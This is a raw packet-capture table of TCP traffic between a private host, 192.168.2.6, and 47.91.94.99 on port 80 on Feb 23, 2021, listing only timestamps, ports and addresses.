Feb 23, 2021 17:51:25.899816990 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899888992 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.899940014 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.899957895 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900007963 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900037050 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900080919 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900161982 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900188923 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900208950 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900238037 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900254011 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900286913 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900302887 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900352001 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900388002 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900407076 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900475025 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900507927 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900546074 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900588989 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900605917 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900650978 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900676966 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900723934 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900840044 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.900882006 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900897026 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900914907 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900934935 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.900943995 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901021004 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901041985 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901067019 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901084900 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901102066 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901134968 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901159048 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901179075 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901232004 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901249886 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901266098 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901277065 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901377916 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901420116 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901434898 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901520014 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901532888 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901542902 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901555061 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901582003 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901604891 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901616096 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901628017 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901664019 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901679039 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901693106 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901700020 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901710987 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901722908 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901745081 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901772022 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901803970 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.901819944 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901832104 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901875973 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901887894 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.901973963 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.902029991 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.902051926 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.902064085 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.902081966 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938437939 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938465118 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938478947 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938497066 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938513041 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938534021 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938553095 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938569069 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938585043 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938601017 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938617945 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938638926 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938656092 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938671112 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938688993 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938705921 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938720942 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938736916 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.938752890 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.939940929 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.939961910 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.939976931 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.940020084 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.941608906 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.941632986 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.941843033 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.941859961 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.941870928 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.941888094 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.941904068 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.941983938 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942065001 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942080021 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942094088 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942107916 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942121983 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942188025 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942260981 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942312002 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942327023 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942431927 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942449093 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942507982 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942538023 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942557096 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942573071 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942671061 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942687988 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.942749977 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943126917 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943150043 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943252087 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943270922 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943412066 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943468094 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943487883 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943598032 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943614960 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943670988 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943689108 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.943753004 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944005966 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944067955 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944112062 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944128990 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944188118 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944346905 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944391012 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944405079 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944451094 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944500923 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.944531918 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.944598913 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.944701910 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.944739103 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.944751024 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.944780111 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944794893 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944832087 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944883108 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.944900990 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.944922924 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944938898 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944979906 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.944991112 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945012093 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945028067 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945082903 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945100069 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945137024 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945166111 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945231915 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945415020 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945430040 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945447922 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945460081 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945488930 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945519924 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945544004 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945571899 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945606947 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945621014 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945636988 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945647955 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945749998 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945820093 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945837975 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945853949 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945868015 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945887089 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945907116 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.945931911 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945949078 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.945988894 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946007967 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946026087 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946059942 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946068048 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946088076 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946099043 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946113110 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946132898 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946149111 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946161985 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946181059 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946197033 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946216106 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946228027 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946245909 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946263075 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946285009 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946302891 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946317911 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946336031 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946346998 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946357965 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946377993 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946392059 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946407080 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946427107 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946440935 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946453094 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946476936 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946484089 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946504116 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946522951 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946532011 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946554899 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946604967 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946620941 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946630955 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946645021 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946655989 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946674109 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946690083 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946702957 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946722031 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946737051 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946758032 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946774006 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946794987 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946810961 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946824074 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946839094 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946856022 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946866035 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946882963 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946897984 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946908951 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946923018 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946937084 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946953058 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.946960926 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946980000 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.946991920 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947010994 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947016954 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947037935 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947047949 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947066069 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947076082 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947091103 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947103977 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947113037 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947123051 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947143078 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947153091 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947168112 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947182894 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947201014 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947217941 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947236061 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947253942 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947264910 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947279930 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947288990 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947303057 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947314978 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947331905 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947344065 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947364092 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947377920 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947395086 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947411060 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947431087 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947438002 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947451115 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947469950 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947480917 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947503090 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947511911 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947544098 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947555065 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947571993 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947585106 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.947597980 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947628021 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947704077 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.947720051 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.988476038 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.988509893 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.988548994 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.988569975 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.988586903 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.988629103 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.988667965 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.988691092 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.988707066 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.988723993 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.988734961 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.988763094 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.988816023 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.988837004 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.988907099 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.988948107 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.988993883 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989006042 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989048004 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989089012 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989104986 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989139080 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989156008 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989197016 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989244938 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989274025 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989321947 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989353895 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989415884 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989641905 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989660978 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989706993 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989727974 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989746094 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989763021 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989777088 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989798069 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989804983 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989820957 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.989833117 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989849091 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.989873886 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991281033 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991307020 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991322041 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991353035 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991377115 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991388083 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991405010 CET	80	49785	47.91.94.99	192.168.2.6
